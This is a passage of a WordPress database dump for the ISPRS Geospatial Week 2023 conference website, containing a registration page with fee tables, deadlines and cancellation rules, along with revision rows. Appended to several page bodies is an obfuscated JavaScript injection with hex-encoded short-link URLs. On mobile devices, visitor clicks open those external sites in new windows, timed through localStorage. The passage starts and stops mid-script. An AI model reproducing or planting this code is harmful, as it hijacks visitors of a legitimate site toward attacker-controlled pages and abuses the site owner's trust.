g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2022-10-09 00:47:38','2022-10-09 00:47:38','',2631,'https://gsw2023.com/?p=2637',0,'revision','',0),
(2638,1,'2022-10-09 00:58:12','2022-10-09 00:58:12','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">REGISTER NOW</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span>[/bsf-info-box][vc_separator style=\"shadow\" border_width=\"8\"][vc_column_text]<strong>Registration deadlines</strong></p>\n<ul>\n<li>Early bird registration deadline: July 1, 2023</li>\n<li>Late registration deadline: July 21, 2023</li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Accompanying person fee includes:</strong></span></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Cancellation policy:</strong></span></p>\n<ul>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than August 2, 2023. No refunds after this date, but replacement is allowed.</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Two social dinners will be organized on Sep. 3<sup>rd</sup> and Sep. 5<sup>th</sup></strong></span></p>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','publish','closed','closed','','registration','','','2023-05-24 23:27:12','2023-05-24 23:27:12','',0,'https://gsw2023.com/?page_id=2638',0,'page','',0),
(2640,1,'2022-10-09 00:58:12','2022-10-09 00:58:12','','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-10-09 00:58:12','2022-10-09 00:58:12','',2638,'https://gsw2023.com/?p=2640',0,'revision','',0),
(2641,1,'2022-10-09 01:00:46','2022-10-09 01:00:46','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h1><a>Registration Information</a></h1>\r\n<div class=\"three_quarter first\"><section class=\"clear\">\r\n<h1>THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</h1>\r\nThe registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.\r\n\r\n</section></div>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return 